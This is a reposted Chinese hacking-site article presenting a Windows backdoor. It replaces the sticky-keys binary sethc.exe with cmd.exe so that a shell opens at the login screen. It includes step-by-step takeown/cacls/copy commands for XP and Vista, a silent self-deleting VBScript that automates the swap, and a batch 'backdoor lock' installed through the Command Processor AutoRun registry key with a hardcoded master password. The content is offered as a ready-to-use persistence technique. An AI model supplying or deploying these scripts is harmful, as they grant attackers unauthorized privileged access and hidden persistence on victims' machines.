黑基网 首页 服务器 Windows Server 查看内容

最酷的windows后门

2009-2-12 07:48| 投稿: winserver

摘要: 来源:安全焦点 后门原理: 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.as...
来源:安全焦点 后门原理: 转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx 在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 参考McafeeAvertLabs:http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/ XP:将安装源光盘弹出(或将硬盘上的安装目录改名)cd %widnir%\system32\dllcacheren sethc.exe *.ex~cd %widnir%\system32copy /y cmd.exe sethc.exe VISTA:takeown /f c:\windows\system32\sethc.execacls c:\windows\system32\sethc.exe /G administrator:F然后按XP方法替换文件 在登录界面按5此SHIFT,出来cmd shell,然后…… 后门扩展: 转至:7j blog http://1v1.name/show-241-1.html#cm300 再更新一下Dim obj, successSet obj = CreateObject("WScript.Shell")success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 第二句最有意思了.嘿嘿..自动应答....以前就遇到过类似的问题 再更新.加个自删除,简化代码...On Error Resume NextDim obj, successSet obj = CreateObject("WScript.Shell")success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) allyesno注:对付文件保护的办法还可以参照我的文章 cut wfp 's jj easily https://www.xfocus.net/bbs/index.php?act=SE&f=2&t=58099&p=269293 后门锁扩展: allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。 用下面的后门锁的方法是 把代码保存为bdlock.bat 然后修改注册表位置即可 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]"AutoRun"="bdlock.bat" @Echo Offtitle 后门登陆验证color aclsset temprandom=%RANDOM%echo 请输入验证码:%temprandom%set/p check=if "%check%"=="%temprandom%%temprandom%" goto passcheckif "%check%"=="%temprandom%" (rem 后门服务器验证rem 如果没有后门验证服务器请rem注释掉下一行代码if exist \192.168.8.8\backdoor$\pass goto passcheck)echo 验证失败pauseexit:passcheckecho 验证成功If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endxSet passcmdlock=http://blog.csdn.net/freexploit/:allyesnoSet Errorlevel=>nulEcho 请输入验证密码?Set password=allyesno Is a pig>nulSet/p password=rem 万能密码if "%password%"=="allyesno is a sb" goto endxIf %time:~1,1%==0 Set timechange=aIf %time:~1,1%==1 Set timechange=bIf %time:~1,1%==2 Set timechange=cIf %time:~1,1%==3 Set timechange=dIf %time:~1,1%==4 Set timechange=eIf %time:~1,1%==5 Set timechange=fIf %time:~1,1%==6 Set timechange=gIf %time:~1,1%==7 Set timechange=hIf %time:~1,1%==8 Set timechange=iIf %time:~1,1%==9 Set timechange=jset/a sum=%time:~1,1%+%time:~1,1%Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nulIf "%errorlevel%"=="0" cls&Echo 口令正确&Goto EndEcho 请联系瑞星客服咨询正确密码!&Goto allyesno:EndSet password=>nulSet Errorlevel=>nulEcho 很好,很和谐!:endx
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部